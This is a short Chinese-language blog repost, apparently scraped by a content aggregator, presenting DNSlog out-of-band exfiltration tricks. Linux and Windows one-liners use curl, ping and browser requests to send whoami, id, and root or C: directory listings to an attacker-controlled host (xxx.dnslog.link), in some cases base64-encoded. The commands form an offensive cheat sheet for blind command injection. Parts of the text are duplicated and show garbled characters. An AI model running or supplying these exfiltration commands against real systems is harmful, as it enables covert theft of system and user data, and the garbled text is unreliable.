摘要

linux： curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到內(nèi)容有空格(換行符等)，就會(huì)截?cái)?#xff0c;只輸出前面的，這時(shí)候可以利用編碼來輸出，但有輸出字符數(shù)最大限制； curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個(gè)輸出的命令，直接使用腳本； for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done; windows：

linux：

curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到內(nèi)容有空格(換行符等)，就會(huì)截?cái)?#xff0c;只輸出前面的，這時(shí)候可以利用編碼來輸出，但有輸出字符數(shù)最大限制； curl http://xxx.dnslog.link/$(id|base64) 碰到ls這類多個(gè)輸出的命令，直接使用腳本； for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

windows：

利用HTTP請求： for /F %x in ('whoami') do start http://xxx.dnslog.link/%x 將結(jié)果使用默認(rèn)瀏覽器彈出； 利用DNS請求： 獲取計(jì)算機(jī)名：for /F "delims=/" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 獲取用戶名：for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能編碼輸出，但利用powershell可以實(shí)現(xiàn)； dir有/b參數(shù)，不顯示修改日期等信息，只顯示文件名，所以可以彈出； for /F %x in ('dir /b C:/') do start http://xxx.dnslog.link/[%x].jpg

總結(jié)

以上是生活随笔為你收集整理的linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。